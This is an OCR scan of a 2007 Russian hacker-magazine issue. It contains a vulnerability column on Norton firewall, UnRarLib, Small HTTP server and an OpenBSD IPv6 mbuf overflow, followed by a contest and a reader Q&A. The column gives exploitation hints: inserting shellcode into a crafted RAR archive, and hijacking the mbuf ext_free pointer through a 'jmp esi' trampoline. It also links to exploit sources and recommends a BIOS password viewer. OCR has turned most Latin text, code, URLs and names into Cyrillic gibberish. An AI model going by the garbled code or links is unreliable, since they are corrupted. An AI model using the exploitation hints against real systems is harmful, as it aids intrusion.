атомах. В итоге получается искусственный 
атом — электронное облако, удерживаемое 
вышеуказанным образом. Искусственный атом, 
в отличие от обыкновенного, не имеет ядра, 




/ 054 



ХАКЕР 04 /100/ 07 





^ ітріап^ 



однако в целом его свойства схожи с обычным 
атомом. Если из большого количества искус- 
ственныхатомов произвести любую объемную 
структуру по типу кристаллической решетки 
полупроводника, то новый материал будет 
иметь другие свойства. Например, такой «полу- 
проводник» сможет вести себя и как металл, и 
как диэлектрик. При этом такие характеристи- 
ки, какцвет, прозрачность, теплопроводность 
и магнитные свойства вещества, также смогут 
изменяться в реальном времени. Полупровод- 
никовые нанокристаллы на основе квантовых 
точек — хороший метод захвата электронов, 
так как хи мики могут выращивать их, добива- 
ясь высокой точности. Какуже было сказано, 
электроны, захваченные квантовымиточками, 
ведут себя также, как если бы они находились 
в обычном атоме, даже если в искусственном 
атоме нет ядра. Типы атомов зависят от набора 
электронов в квантовой точке. Удивительно, 
правда?Таким образом, различными наборами 
электронных ловушек создается искусственная 
программируемая материя... Фактически это 
означает изменение атомного числа искусст- 
венного атома. Вот здесь и можно применить 
термин «программируемая материя», потому 
что такой процесс легко можно контролировать 
с помощью современной микроэлектроники, 
создавая материалы, которых в природе не 



существует. Программируемые вещества, 
использующие свойства квантовыхточек, 
возможны. На сегодняшний день существуют 
прототипы частиц программируемой материи. 

И изменение свойств программируемых ве- 
ществ не виртуальное, а вполне реальное. 
Пойдем дальше. Если поместить квантовые 
точки на поверхность микроскопических воло- 
кон и собрать волокна вместе, то мы получим 
сверхчип (ѵѵеіізіопе = циапіит ѵѵеіі + 5і зіопе), 
который и будетосновой программируемого 
«пластилина». Если теперь прозрачный сверх- 
чип из квантовых точек за программировать на 
очень низкий коэффициент рефракции, то его 
оптические характеристики могут быть подоб- 
ны характеристикам вакуума или воздуха. То 
есть материал будет абсолютно невидимым, и, 
например, самолет, построенный из подобного 
материала, нельзя будет наблюдать ни глазами, 
ни с помощью существующих электромагнит- 
ныхсканеров. И это далеко не единственное 
применение сверхчипа, так как пожеланию его 
можно перепрограммировать! 

□ Постскриптум 

Можно суверенностью сказать, что ученым 
удастся получить сверхчип в течение деся- 
тилетия. Если концепция программируемой 
материи будет реализована, то это ознаменует 



собой переворотв человеческой цивилизации. 
Эта технология обеспечит не только гиперком- 
пьютеры и широкий спектр новых материалов, 
но и такие устройства, которые мы стобой пока 
не можем себе даже вообразить. 

Новые материалы будут создаваться за считан- 
ные секунды, не надо будет ничего рассчиты- 
вать наперед. Отпадутза ненадобностью этапы 
проектирования и производства прототипов, 
можно будет просто задать основные свойства 
материала. В будущем математика и програм- 
мное обеспечение объединятся в концепции 
программируемой материи. И знаешь, неваж- 
но, что это будет — органика или сверхчипы; 
и то, и другое — две стороны неукротимого 
процесса технологизации человеком его среды 
обитания. Инженеры из США создал и новый 
тип композиционного материала, сочетающий 
высокую прочность с гибкостью и эластичнос- 
тью паутины. Материал создан на основе по- 
лимерного эластомера эластана с включением 
в его структуру наноразмерных кусочков клея. 
Получившийся нанокомпозит, благодаря клею, 
стал гораздо эластичнее и прочнее эластана. 
Этот наноматериал может найти широкое 
применение в оборонной, текстильной и 
биомедицинской промышленности. Возможно 
применение нового эластомера в составе воен- 
ной брони для солдатского обмундирования. □С 





Компьютеры СиагШаФ серии іСШ5 с технологией ѵРго 74 

поддерживают инновационные функции безопасности, 
производительности и удаленного управлений, 
которые позволят Вам экономить время 
при обслуживании инфраструктуры 
и уделить больше времени развитию своего бизнеса 
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> Страничка компании Маіоизес — 
Тгапзрагепі зесигііу 



ІМогІоп Регзопаі Рігеѵѵаіі: 
локальный отказ в обслуживании 

ВгіеТ' 

Дополнительные защитные средства 
(антивирусы, персональные брандмауэры 
ит.д.) зачастую сами становятся объектами 
атаки, и, вместо обещанного рекламой 
усиления защиты, мы получаем новые 
дыры, одна из которых была обнаружена 
БаѵісГом Маіоизек'ом (основателем и руко- 
водителем одноименной исследователь- 
ской компании — Маіоизес — Тгапзрагепі 
зесигііу) 1 5 сентября 2006 года, экспери- 
ментируя с версий 9.1 .0.33, он посылал 
псевдоустройству \Беѵісе\5утЕѵеп1: 
(созданному брандмауэром) различные 
ІОСТб-запросы, которых оно, признать- 
ся, не ожидало, и отудивления высадило 
систему на полный В50Б. ОаѵісІ уведо- 
мил производителя об ошибке, которая 
была исправлена в следующей версии 
и зафиксирована в базе Зесигііу Еосиз 
под номером В I О 20051 (множественные 
локальные отказы в обслуживании в 
драйвере ЭутЕѵепі). Новверсии9.1.1.7 
разработчики вернули ошибку на место, 
что привело к возможности обрушения 
системы древним эксплойтом. Подроб- 
ности об этом инциденте можно найти 
на ѵѵѵѵѵѵ.таіоцзес.сопп/іпі'о/асіѵізогіез/ 
Ыог1:оп-І пзиббісіепіі-ѵа ІісІа1:іоп -об- 
ЗѵігіЕѵепІ-бгіѵег-іприІ-Ьи^ег.рІір . 

Тагде-Ь 

Уязвимость впервые обнаружена в версии 
9.1 .0.33 и «реикцинирована» в версии 
9.1 .1 .7; промежуточные версии выпущены 
без этой ошибки. 

Ехріоі^ 

"Исходный текст сплоита на языке Си 
лежитна сервере компании Маіоизес: 
ѵѵѵѵѵѵ.ппаііоизес.сопп/боѵѵпіоабз/ 
ѵѵіпбоѵѵз-регзопаі-бгеѵѵаи-апаіѵзіз/ 
ВТР0001 1 Р002ЫЕ.2Ір . 

Зоіи-Моп 

Использовать стабильные версии между 
9.1.0.33 и 9. 1.1. 7. 




> Здесь раздают ипгагІіЬ 



ІІпгагІіЬ: локальное 
переполнение буфера 

Вгіеі 7 

ІІпіцие РАР Еііе ЫЬгагу представляет 
собой бесплатную кроссплатформенную 
библиотеку, распространяемую в исходных 
текстах ( ѵѵѵѵѵѵ.цпгагІіЬ.огд ) и, каклегко 
догадаться из ее названия, позволяющую 
сторонним программистам создавать 
независимыеутилиты для распаковки 
РАР-архивов или интегрировать библио- 
течный код в свои собственные продукты, 
обеспечивая его прозрачную поддержку. 

К сожалей ию, библиотека не свободна 
от ошибок, некоторые из которых носят 
характер критических, как, например, 
ошибка переполнения в имени файла, 
обнаруженная хакером по кличке зіагсасіі 
и описанная на ЬирУ/зесигііуѵцІпз.сот/ 
пеѵуз/ЦпгагІіЬ/ВО.ЫіппІ . Сутьошибки 
состоит втом, что имя распаковываемого 
файла копируется в локальный буфер фик- 
сированного размера длинной в 255 байт, 
что является пределом для ѴѴіпбоѵѵз, и 
файл с более длинным именем ни создать, 
ни открыть неудастся. Но в архиве длина 
имени файла ограниченатолько длиной 
самого архива. Естественно, такой архив 
нельзя создать легальным путем с помо- 
щью самого РАР'а, но что мешаетхакеру 
смастеритьархив самостоятельно или над- 
ругаться над уже существующим? При этом 
мы получаем классическое переполнение 
стека с возможностью передачи управ- 
ления на зЬеІІ-код и захвата управления 
машиной. 

На данный момент уязвимость подтверж- 
дена в версии 0.4.0; про другие версии 
пока ничего не известно. 

Ехріо-И: 

Готовые эксплойты в дикой природе еще 
не обнаружены, но, используя «легаль- 
ный» гаг-архив, длину файла можно легко 
увеличитьс помощью Ніеѵѵ'а и сего же 
помощью вбитьтуда боевой зЬеІІ-код. 

Зоіи+іогі 

Да поможет нам Аллах :). 



» 




> Поле Репу-ІР со списком блокируемых 
адресов, подверженное переполнению 

Бтаіі ННр зегѵег: локальное 
переполнение буфера 

Вгіеі 7 

ЭтаІА ЫПр (зтаіізгѵ.сопп) — надежный, 
проворный и чрезвычайно компактный 
ЬирЛір/ргоху/рорЗ/зтір/бпз/сІЬср-сервер 
в одном флаконе (а для граждан бывшего 
СНГ к тому же еще и бесплатный). Сейчас 
он стоиту меня на компе, сменив ѴѴаг ЕТР- 
сервер, и я, естественно, слежу за его бе- 
зопасностью, шуршалогами и добавляя в 
блэк-листвсе новые ІР-адреса, обладатели 
которых — конкретные крысы. Так вот после 
добавления нового ІР в Оепу-ІР, сервер 
через некоторое время вылетел в ЭоШСЕ, 
который я держу всегда запущенным, 
демонстрируя ситуациютипичного пере- 
полнения. Анализ показал, что последний 
внесенный в блэк-лист ІР (87.250.254.249), 
принадлежащий Уапсіех'у, был усечен 
сервером до 87.250.254, и, при попытке 
подключения с адреса 8 7. 2 50. 2 54. ххх, у 
БплаИ ЬПр что-то перемкнуло внутри парсе- 
ра ІР-адресов и возникло необработанное 
исключение, отловленное айсом. Дело 
кончилосьтем, что я, отправив разработ- 
чику уведомление об ошибке, перенес 
блэк-лист на персональный брандмауэр. 
Эксперименты со списком блокируемых 
адресов быстро опровергли первона- 
чальную гипотезу о фиксированной длине 
поля Бепу-ІР и не позволили поставить 
условия, при которых происходитусечение 
последнего введенного адреса. Судя по 
всему, помимо количества ІР-адресов, тут 
присутствуют еще и другие факторы. 

Тагде^з 

Уязвимость обнаружена в версии 3.05.64; о 
других мне ничего не известно. 

Ехріоі* 

Фрагмент конфигурационного файла с 
черным списком ІР-адресов, на которых 
наблюдается устойчивое воспроизведе- 
ние ошибки, вместе с кратким описанием 
ситуации лежит в моей норе по адресу 
ЬирУ/пегиті.огд.ги/зоигіі/Ьаск/Ьир.с^ . 

Зоіи^іоп 

Блокировать ІР-адреса на брандмауэре. 
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ООрепВБО: переполнение буфера при по- 
лучении фрагментированного пакета ІРѵб 

ВгіеГ 

20 февраля 2007 года сотрудники лаборато- 
рии Согебабз Абѵізогу обнаружили, что, при 
получении фрагментированного ІРѵб-пакета, 
ОрепВВО, воздвигнутая в конфигурации по 
умолчанию, выпадает в кегпеі рапіс. На следу- 
ющий день разработчикам системы был выслан 
ргоококсопсері ехріоіі, демонстрирующий 
удаленный отказ в обслуживании, успешно 
подтвержденный и довольно оперативно 
залатанный. Однако статуса уязвимости ошибке 
так и не присвоили, поскольку, по мнению 
представителей ОрепВЗО-іеат'а, отказ в 
обслуживании — это не дыра, а просто мелкая 
неприятность, о которой пользователям знать 
вовсе не обязательно. 

Такое положение дел разозлило парней из 
СогеІ_аб5, и они ценой недели беспощадных 
исследований доказали возможность удален- 
ного захвата управления, выпустив 5 марта 
боевую версию сплоита с збеИ-кодом на борту, 
от которого разработчикам ОрепВЭО былоуже 
не отвертеться. И вся последующая неделя 
ушла на переписку с СогеІ_аб5, подгото- 
вившей за это время развернутый отчет по 
безопасности, который был опубликован ими 
на собственном сайте. 13 марта координатор 
проекта ТЬео бе Раабі переслал его на Видігад, 
откуда он разошелся по другим сайтам, прямо 
или косвенно связанным с безопасностью. 

Это вторая дыра в ОрепВЗО, обнаруженная за 
последние 10 летпромышленной эксплуатации 
(предыдущая сидела в демоне 55Н), так что ее 
открытие можно назватьэпохальным событием, 



привлекающим ксебе внимание и вызывающим 
желание как следует во всем разобраться. 

Уязвимости подвержены следующие версии: 
ОрепВЭЭ 4.1 , ОрепВЭО 4.0 Сиггепі, ОрепВВО 4.0 
ЭіаЫе, ОрепВВО 3.9, ОрепВВО 3.8, ОрепВЭО 3.6 
и ОрепБЭй 3.1 . 

Ехріоіі: 

Исходный текст эксплойта можно найти 
в отчете Согебабз, доступном по адресу 
ѵѵѵѵѵѵ.соге5есцгііѵ.сот/?асііоп=ііет&іб=1 703 . 

Он написан на Питоне и требует библиотеки 
ІтраскеО используемой для создания сырых 
(гаѵѵ) сокетов и доступной для бесплатного ска- 
чивания по адресу ЬНр://о55.соге5есигііу.сот/ 
рго]есІ5/ітраскеі.Ыт[ . ЭИеІІ-код состоит из 
одной-единственной инструкции ІІ\ІТ ОЗЬ (точка 
останова, вызывающая всплытие отладчика) 
и следующихза ней команд балансировки Е5Р 
и возврата внутрь ядра. Фрагментированный 
ІРѵб-пакетзасовывается внутрь ІСМР-пакета 
с полем Іуре, равным 128 (ІСМРесбо гедиезі), 
который должен быть послан злоумышленни- 
ком непосредственно по локальной сети, либо 
через какой-нибудьтоннель ІРѵб оѵег ІРѵ4. В 
противном случае удаленная атака не состоится 
и хакер склеит ласты, а он их непременно склеит, 
так как популярность протокола ІРѵб еще долгое 
время будет оставаться на уровне чуть выше 
абсолютного нуля, по крайней мере в глобаль- 
ном масштабе. 

Зоіігііоп 

Заплатки для ОрепВ5О4.0 иЗ. 9 доступны по 
следующим адресам: Йр://Йр.орепЬ5б.огд/риЬ/ 



ОрепВ5Р/раІсЬеБ/4.0/соттоп/010 т бирі. 
раІсЬ . ЙрУ/кр.орепЬзб.огд/риЬ/ОрепВВР/ 
ра1сЬе5/3.9/соттоп/020 т бирІ.раісЬ . Вер- 
сия 4.1 залатана непосредственно в исходном 
коде, и отдельной заплатки для нее нет. 

Также можно не уста на вливать за платку, а 
заблокировать весь ІРѵб-трафик на встроенном 
в ОрепВЭР брандмауэре (естественно, при 
условии, что он не нужен). Для этого необходимо 
выполнить следующую последовательность 
действий: 

БЛОКИРОВАНИЕ ВСЕГО ІРѴ6-ТРАФИКА 
НА ВСТРОЕННОМ БРАНДМАУЭРЕ 

# добавить следующую строку в 
файл /ебс/рТ . сопТ : 

Ыоск іп риіск іпебб аіі 

# загрузить обновленный рТ.сопб 

# внутрь запущенного РР посредс- 
твом утилиты рбсбі 

рбсбі -б /ебс/рб.сопб 

# разрешить его использование 
рбсбі -е -б /ебс/рб.сопб 

# посмотреть текущий статус 

# на предмет проверки успешности 
принятия нового правила 

рбсбі -з гиіез 

Чтобы разобраться в дыре основательно и 
(самое главное) самостоятельно, необходимо 
иметь установленную ОрепВЗО, а поскольку 
таковой внутри моей норы не обнаружи- 
лось, пришлось курить исходныетексты. Но 
исходные тексты ОрепВЗО курить можно до 
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>Всеголишьдвеудаленныедыры в конфигурации поумолча- 
нию более чем за 10 летэксплуатации 




бесконечности, а они даже не убавятся. Нет! Тут нужно мыслить стра- 
тегически и действовать по плану! Сетевой стек — весьма масштаб- 
ное сооружение, и заблудиться в нем намного проще, чем понять его 
устройство, хотя бы и в самых общих чертах. Нам это, собственно, и не 
нужно, поскольку, чтобы локализовать ошибку в миллионах строк про- 
граммного кода, достаточно просто взглянуть на патч, представляющий 
собой простой сШ-файл, который возник в результате сравнения двух 
версий: исправленной и старой: 

ПАТЧ ДЛЯ ОРЕИВЗО 

зуз/кегп/-иірс_шЬиб2 . с 1.24 



+++ зуз/кегп/иірс_шЬиб2 . с 1.24.2.1 

@@ -226,16 +226,14 @@ 

т_скір1 ( збгисб тЪиб *т, іпб обб, іпб Іеп, 

{ 

збгисб тЪиб *п; 
іпб 1; 

- іпб соруМг; 

і б (іеп > МСЬВУТЕЗ) 
гебигп (ШЬЬ) ; 

іб (обб == 0 && (т->т_б1адз & М_РКТНБК) != 0) 








{ 

соруксіг = 1; 

МСЕТНБК. (п , ѵ\/аік, т->т_куре) ; 

+ М_ШР_РКТНБК(п, т) ; 

1 = МНЬЕЫ; 

} еізе { 

соруМг = 0; 

МСЕТ(п, ѵ\/аік, т->т_куре) ; 

1 = МЬЕЫ; 

} 

@@ - 249,8 + 247,6 @@ 
т_с1ир1 ( зкгиск тЪик *т, іпк окк, 
іпк Іеп, 
ік (>п) 

гекигп (ШЫі) ; 

— і Р: (соруМг) 

М_ШР_РКТНБК(п, ш) ; 
т_сорус!ака (т, окк, Іеп, 
ткос1(п, сас1с1г_к) ) ; 
п->ш_1еп = Іеп; 

На первый взгляд, суть изменений совершенно 
неясна. Разработчики просто переместили макрос 
М_Р11Р_РКТН0Р из конца функции т_бир1 () внутрь 
ветки «Т(оТ== 0 попутно избавившись от пе- 
ременной-флага соруЫг. Но ведьалгоритм функции 
гш_бир1 () остался прежним и при этом совершенно 
непостижимым. Ковырять патч дальше бессмыс- 
ленно. Ничего нового выжать из него неудастся, и 
без помощи исходных те кето в не обойтись. 

Идем на Ьир:/Лхг.ѵѵаі50п.огдЛхг/5оигсе/кегп/ 
иірс тЬиІ2.с?ѵ=0РЕЫВ5Р и смотрим на полный 
код функции гтт_сІ и р 1 (), критические фрагменты 
которого в патче отсутствуют: 

ПОЛНЫЙ ИСХОДНЫЙ ТЕКСТ 

функции м_оирі{) 

зкакіе зкгиск тЪик * т_с!ир1 
(зкгиск тЪик *т, іпк окк, .. Іеп, 
іпР ѵ\/аік) 

{ 

зРгисР тЬиР *п; ІпР 1; 
іпР соруМг; 

іг (Іеп > МСЬВУТЕЗ) 
геРигп (ШЬЬ) ; 

ІР (оРР == 0 && 

(ш->ш_Р1адз & М_РКТНБК) != 0) 

{ 

соруркіг = 1 ; 

МСЕТНБЕ (п , ѵтаіР, т->т_Руре) ; 

1 = МНЬЕЫ; 

} 

еізе 

{ 



соруМг = 0; 

МСЕТ(п, ѵ\/аік , ш->ш_Руре) ; 

1 = МЬЕЫ; 

} 

іі (п && Іеп > 1 ) 

{ 

МСЬСЕТ (п, отаік) ; 

ІР ( (п->т_Р1адз & М_ЕХТ) == 0) 

{ 

ш_Ргее (п) ; 
п = ШЬЬ; 

} 

} 

ІР ( і п ) геРигп (ШЬЬ) ; 

ІР (соруксіг) 

М_ШР_РКТНБК(п, ш) ; 

ш_сорусіаРа (ш, оРР, Іеп, 
ткос1(п, сас!с1г_к) ) ; 

п->ш_1еп = Іеп; 
геРигп (п) ; 

} 

Злобный сШ покоцал ветвь«Т (п && Іеп > I]», сбив 
нас с толку и завязав наш хвостдвойным морским 
узлом. Нотеперьмы вникли втему: в исправлен- 
ной версии макрос М_01ІР_РКТН0Р вызыва- 
ется до МСЦЗЕТ, а в старой — после. Осталось 
только узнать, чем все эти макросы занимаются. 
Нет ничего проще — на Ьсг.ѵѵаіъоп.огд все они 
представлены ссылками, щелкнув по которым мы 
переходим к месту их определения, снабженного 
комментариями. Точнотакимже путем разбира- 
емся с М_РКТН0Р и т->т_йад5, проясняющими 
смысл конструкции «Т Ы! == 0 && (т->т_Еад5& 
М_РКТН0Р) != 0)», который в переводе на русский 
языкзвучитприблизительнотак: если смещение 
(оИ] пакета равно нулю, но не совпадаете началом 
пакета, то мы имеем дело с фрагментом пакета, 
для обработки которого входим внутрь ветки іі 
Макрос М6ЕТНРР выделяет память под специ- 
альную структуру гл Ьиі (в данном случае указатель 
на нее помещается в переменную п) итутже 
инициализируетее для хранения пакетовтипа 
т->т_іуре. Макрос МСЮЕТ заглатывает запол- 
ненные структуры тЬіЛ и объединяет их в кластер, 
осуществляя сборку пакетов. Но в непофикшен- 
ной версии объединение пакетов происходит до 
вызова макроса М_01ІР_РКТН0Р, копирующего 
переданный функции указатель т в выделенную 
и проинициализированную переменную п. Вот 
где собака зарыта! Поскольку выделение памяти 
под фрагменты осуществляется сразу же после 
инициализации тЬік и до заполнения ее полей 
реальнымизначениямидо попытка копирова- 
ния всех фрагментов функцией т_сорубаіа() в 



переменную т приводиткпереполнению. Авсе 
потому, что макрос М_01ІР_РКТН0П стоит не на 
месте! Вроде бы мелочь, а какие последствия она 
вызывает. Кстати говоря, парни из СогеЕаЬзэтот 
момент никак не объясняют, заставляя нас гадать, 
каксвязана фрагментация с переполнением и на 
сколько фрагментов пакет необходимо разбить 
для успешной атаки. Забавно, но некоторые 
ресурсы по безопасности (особенно русские), 
передирая письмо ТЬеобе Раасіі'а, кприлага- 
тельному «фрагментированный» добавляют 
наречие «сильно». Дескать, шлите, ребята, 
сильно фрагментированные ІРѵб-пакеты и валите 
ОрепВЗО косяками. На самомделе, воригинале 
слово «сильно» отсутствует, и прилагаемый к 
письму эксплойт разбивает I Р-пакет всего на два 
фрагмента, так что называть его сильно фрагмен- 
тированным нельзя. 

Но это все лирика, пора переходить ктехнике 
передачи управления на зЬеН-код, поскольку 
вгонять ядро в панику как-то неинтересно. 

Так как это не совсем обычное переполнение, 
традиционные приемы здесь не подходят и на- 
чинать приходится с изучения полей структуры 
тЬикб, описанной в файле/зуз/тЬикЬ: 

УСТРОЙСТВО СТРУКТУРЫ МВЫР 

зкгиск тЪик 

{ 

зкгиск т_к<іг т_кс!г ; 

{ 

ипіоп 

{ 

зкгиск 

{ 

зкгиск рккксіг МН_ркккс1г; 

/* М_РКТНБЕ зек */ 
ипіоп 
{ 

зкгиск т_ехк МН_ехк; 

/* М_ЕХТ зек */ 

скаг МН_сіакаЪик [МНЬЕЫ] ; 

} МН_с1ак ; 

} МН; 

ска г М_йакаЬик [МЕНЫ] ; 

/* !М_РКТНБК, !М_ЕХТ */ 

} 

} М_с1ак ; 

}; 

Парни из СогеЕаЬз верно подметили, что одним 
из элементов структуры тЬіЛ является структура 
гтт ехі, описанная в файле /зуз/тбиТЬ: 

УСТРОЙСТВО СТРУКТУРЫ М_ЕХТ 

зкгиск ш_ехк 

{ 



/060 
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// зЦагЦ оГ ЬиТГег 
сасісІг_Ъ ехЦ_Ъи:Е; 

// Ггее гоиДіпе ІГ по*: Ыіе изиаі 
ѵоісі ( *ехЬ_:Егее) (са.6.6г_Ь , 
и_іпД , ѵоісі * ) ; 

// агдшпепЬ Тог ех1:_ігее 
ѵоісі *ехТ_агд; 

и_іпТ ехі_зІ 2 е; // зі^е об ЬиТГег, Тог ехС_Ггее 

і пт, ехТ_Ьуре; 

зТгисТ тЬиі *ех*:_пех1:геі ; 

зТгисТ тЬиі *ех*:_ргеѵгеі ; 

#іі(3е€ БЕВШ 

сопзі сііаг *ехТ_оГі1е; 
сопзі сііаг *ехТ_пТі1е ; 
іпі ехТ_о1іпе; 
іпі ехТ_п1іпе; 

#епсИТ 



Из множества разныхтипов данных в структуру т_ех* входит указатель 
на функцию ехНтее, которая вызывается из тДгееП, когда приходит 
последний фрагмент пакета. Аэто значит, что, заменив ех*_агд ука- 
зателем на збеіі-код, мы вместо банального краха системы добьемся 
перехвата управления. 

Вся сложность в том, что мы незнаем, где именно размещается перепол- 
няемая структура тЬиі в памяти, поэтому возникает задача определения 
ее дислокации. Парни из СогеЬаЬз называютее поиском «правильного 
трамплина» (гідШгатроІіпе) и решают следующим образом... 

Но прежде — небольшое лирическое отступление. Словарь«Мультилекс» 
переводит «*гатроІіпе»как«батут», и поэтому поводу вспоминается 
следующая невероятно правдоподобная история изжизни. В одном из 
небольших городов театр проездом давал «Грозу» Островского, в которой, 
согласно сюжету, Катерина должна была бросаться в реку. Естественно, 
для смягчения последствий падения использовались маты. С собой их 
не возили, перекладывая задачу организации всего необходимого на 
местных. И вот местные, покурив хорошей травы, вместо мата по ошибке 
положили батут. Короче, бросается, значит, Катерина в«реку»итутжес 
криком вылетает обрати о. И та к несколько раз. Актеры с трудом сдержи- 
ваются (сцена-то трагическая), зрители втрансе, и в этот момент один из 
стоящих на сцене произносит: «Да... Не принимает матушка Волга». 

У нас страмплином возникаетта же ситуация, только вместо Волги у 
нас В50, а вылетает не Катерина, а исключение. И продолжает выле- 
тать до тех пор, пока мы не угадаем точную локацию переполняемой 
структуры в памяти, которую парни из СогеЬаЬз добывают довольно 
варварским путем: «о^сіиппр -б /ЬзсІ I дгерезі I дгер)тр», то есть ди- 
зассемблируют конкретную версию ОрепВЗй и ищут в ней инструкцию 
Ітр езі. При чемтутезі? По чистой случайности компилятор разместил 
в нем указатель на переполняемую структуру, но где гарантия, что при 
малейшем изменении исходного кода или компиляции сдругими клю- 
чами компилятор не выберет иную стратегию поведения и не засунет 
указатель совсем вдругой регистр?Увы, такой гарантииу нас нет, а 
потому ргооПоПсопсер* ехріоі* крайне неуниверсален и ненадежен. 
Атаковать произвольную систему с его помощью не получится, и он 
годится только для взлома систем, установленных «из коробки» (то 
есть поставляемых в уже откомпилированном виде), да и то в разных 
версиях положение «трамплина» будет различным. Так что опасность, 
грозящая пользователям ОрепВВО, очень сильно преувеличена. □с 



Журнал ХАКЕР и компания 
ПАНАВТО объявляют конкурс: ты 
можешь выиграть классный скутер 

Ваоііап ВТ490ГМ8! 




Чтобы сделать это, тебе нужно прислать 
ответы на 4 хакерских вопроса. Чем скорее 
и лучше ты это сделаешь, тем больше у тебя 
шанс выиграть крутой скутер! 



Вопрос №1 

і=і++ + ++(і=і==(і=-23)); 
Чему равно і после 
выполнения данного 
выражения на МісгозоД 
Ѵізиаі С++ 7.0? 



Вопрос №2 
Что означает 
ЗЗс5б4954сІа88181442СЖЗЬ 
а39772644? 



Вопрос №3 
Атаку какого типа 
удалось провести на 
бетке висты Жанне 
Рутковской для 
выполнения кода с 
привилегиями ядра? 



Вопрос №4 
Что изображено на 
обложке первого номера 
Хакера? 






уІо-Ѵ 



0С^\ оЛ&о 



Ответы присылай на 
рапаѵіойгеаі.хакер.ги 



панавто 



Квадроциклы Мотоциклы 
Гидроциклы Скутеры 
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ИВАН СКЛЯРОВ 




^0: КАКИЕ КНИГИ ПОХАКИНГУ ПОСОВЕТУЕШЬ ПОЧИТАТЬ? 

Во- А: В большинстве случаев книги по хакингу или сетевой безопасности 
пи шут люди, далекие от этих тем; л ишь за редким исключением 
появляются действительно достойные экземпляры, как, напри- 
мер, отечественный хит в прошлом «Атака на интернет». Пере- 
числять названия книг, которые я рекомендовал бы прочитать, в 
журнале я не буду. Специально на этот случай я собрал на своем 
сайте названия лучших книг по хакингу и сетевой безопас- 
ности, а также по программированию, администрированию, 
ѵѵеЬ-дизайну и прочему со ссылками на интернет-магазин, 
поэтому советую тебе сходить по следующему адресу в интер- 
нете : ѵууууутБкІу^ Однако в первую очередь я 

рекомендую тебе читать книги по программированию: Си, С++, 
АвветЫег, РНР, Регі ит.д. 

( V ПОДСКАЖИ КАКУЮ-НИБУДЬ ПРОГРАММУ ДЛЯ ПОДГЛЯДЫ- 
ВАНИЯ/СНЯТИЯ ПАРОЛЯ, УСТАНОВЛЕННОГО НА ВІ05, КОТОРАЯ 

РАБОТАЛА БЫ ПОД ЬШиХ? 

^А: Рекомендую программу СтозРѵѵсІ ( ѵѵѵѵѵѵ.сдзесигііѵ.огд ); она совер- 
шенно бесплатна и распространяется под различные опера- 
ционные системы Юо5, ѴѴіпсІоѵѵв, І_іпих, РгееВЗй и ЫеіВЭО) с 
исходными кодами подлицензией ѲІЧІІ РиЫіс Ысепзе. СтозРѵѵсІ 
позволяет как сбрасывать пароли для большинства версий В 105, 
так и просто просматривать их. Только хочутебя предупредить, 
что показанные этой программой пароли могут отличаться от ре- 
ально установленных (особенно это ха рактерно для Аѵѵагб В 105], 
однако, несмотря на это, они будут рабочими. 

ЧТОТАКОЕ НТТР РЕ5Р0Ы5Е 5РЫТТІН6? 

^А:Так называется сравнительно молодая атака. Она основывается на 
том, что протокол НТТР позволяетпрерыватьзаголовоки начи- 
нать новый, который и будет считаться правильным. Эта атака 
не на сервер, а на пользователя, подобноХ55. Хакер должен 
послать единственный НТТР-запрос, который заставит веб-сер- 
вер сформировать такой выходной поток, который будет принят 



жертвой за целых два НТТР-ответа (вместо одного правильного). 
НТТР Ревропве 5рШіпд позволяет проводить целый ряд атак, 
таких какотравление веб-кэша, подмена страниц, кража пользо- 
вательской информации и межсайтовый скриптинг. Подробнее 
об этой атаке ты можешьузнать из статьи N і кііогг'а «Ядовитый 
ответ» («Хакер», #071) или ѵѵѵѵѵѵ.раскеізіогтзесигііѵ.огд/рарегз/ 
депегаІ/ѵѵЫіерарег Ьиргезропзе.рсК (на английском языке). 

^ О: У МЕНЯ В СПИСКЕ ПРОЦЕССОВ ѴѴШ00ѴѴ5 ХР ЗАПУЩЕНО 
НЕСКОЛЬКО КОПИЙ ПРИЛОЖЕНИЯ 5ѴСН05Т.ЕХЕ. ГОВОРИТ ЛИ ЭТО О 
ТОМ, ЧТО Я ПОДЦЕПИЛ ТРОЯНА? 

^А: Само по себе наличие нескольких копий зѵсбозТехе не говорит 
о деятельности вредоносного ПО. ЭѵсЬозТехе — это главный 
системный процессдля служб, которые запускаются из динами- 
чески загружаемых библиотек (0І_І_-файлов). Поэтому в системе 
вполне может быть запущено несколько экземпляров процесса 
зѵсЬозТехе, нос разными РЮ. Каждый изтакихэкземпляров 
представляет собой определенную системную службу или группу 
служб. Эти группы определены в следующем разделе реестра: 

Н КЕѴ_І_0 С АІ__М АС Н I N Е\5оЙѵѵа ге\М і сгозойАѴѴі п б оѵѵз N Т\ 
СиггепіѴегзіоп\5ѵсЬозС Каждый параметр этого раздела пред- 
ставляет собой отдельную зѵсЬозІ- группу и отображается при 
просмотре активных процессов какотдельный экземпляр зѵсбозС 
ехе.Ты можешь просмотретьсписокслужб, выполняющихся в 
каждом процессе зѵсбозТехе, с помощью команды іазкІізі/ЭѴС. 
Среди этих служб легко можеттаиться троян, поэтому вос- 
пользуйся поисковиком, чтобы узнать о каждой показанной 
службе. Также помни, что системный файл зѵсбозСехе должен 
находиться в папке \%5уз1;ет Роо1;%\5у5І;ет32\. Если он 
находится в другом месте, то это, скорее всего, указывает на 
вредоносное ПО. 

^0: ПИШУ СНИФЕР ПОД РКЕЕВ50 НА СИ И ОБНАРУЖИЛ, ЧТО В 
ЭТОЙ ОС ОТСУТСТВУЮТ ПАКЕТНЫЕ СОКЕТЫ, КАКЖЕ ТОГДА ОТЛАВ- 
ЛИВАТЬ ПАКЕТЫ НА КАНАЛЬНОМ УРОВНЕ? 



_/ 062 _ 

іГ:ж::ж:: 
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Во- А: Во РгееВЗй для-работы на канальном уровне необходимо исполь- 
зовать пакетный фильтр ВЭй (ВРР). Все подробности по работе с 
этим фильтром смотри в гшап ЬрЕ Но вместо того чтобы напрямую 
использовать ВРР, ты можешь для тех же целей задействовать 
кроссплатформенную библиотеку ІІЬрсар ( ѵѵѵѵѵѵ.ісрсіитр.огд ). 



и КАК СКРЫТЬ ІР-АДРЕС ОТ ПОЧТОВОГО СЕРВЕРА ПРИ ПОЛУЧЕ- 
НИИ ПОЧТЫ? 

Во- А: Ты можешь просто воспользоваться ѵѵеЬ-интерфейсом к почтовому 
ящику, а свой браузер настроить на работу через анонимный 
прокси-сервер. Однако не все почтовые серверы предоставляют 
ѵѵеЬ-интерфейс. В таком случаетебе придется принудитель- 
но «соксифицировать» почтовый клиент, так как ни один из 
известных мне мылеров не предоставляет работу через прокси 
(ОіЛІоок, ТЬе Ваі! и т.д.). Воспользуйся для этого программой 
